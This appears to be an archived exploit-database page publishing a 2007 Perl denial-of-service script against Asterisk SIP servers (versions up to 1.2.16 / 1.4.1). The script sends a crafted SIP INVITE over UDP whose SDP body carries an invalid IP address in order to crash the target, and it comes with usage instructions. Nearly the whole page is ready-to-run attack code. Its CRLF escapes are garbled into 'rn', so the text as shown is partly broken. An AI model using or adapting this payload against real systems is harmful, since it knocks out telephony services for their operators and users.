[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Asterisk <= 1.2.16 / 1.4.1 SIP INVITE Remote Denial of Service Exploit
# Published : 2007-03-25
# Author : MADYNES
# Previous Title : PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC
# Next Title : 0irc-client v1345 build20060823 Denial of Service Exploit
#!/usr/bin/perl
# perl asterisk-Invite.pl 192.168.1.104 5060 userX 192.168.1.2 5060 userY
use IO::Socket::INET;
die "Usage $0 <dst> <dport> <dusername> <src> <sport> <susername>" unless ($ARGV[5]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg="INVITE sip:$ARGV[2]@$ARGV[0]:$ARGV[1] SIP/2.0rnVia: SIP/2.0/UDP $ARGV[3]:$ARGV[4];branch=01;rportrnTo: <sip:$ARGV[2]@$ARGV[0]:$ARGV[1]>rnFrom: <sip:$ARGV[3]:$ARGV[4]>;tag=01rnCall-ID: 01@$ARGV[3]rnContent-Type: application/sdprnCSeq: 01 INVITErnContent-Length: 187rnrnv=0rno=root 25903 25903 IN IP4 $ARGV[3]rns=sessionrnc=IN IP4 $ARGV[3]rnc=IN IP4 910.188.8.2rnt=0 0rnm=audio 13956 RTP/AVP 0 4 3 8 111 5 10 7 18 110 97 101rna=rtpmap:98 speex/16000rnrn";
$socket->send($msg);
# www.Syue.com [2007-03-25]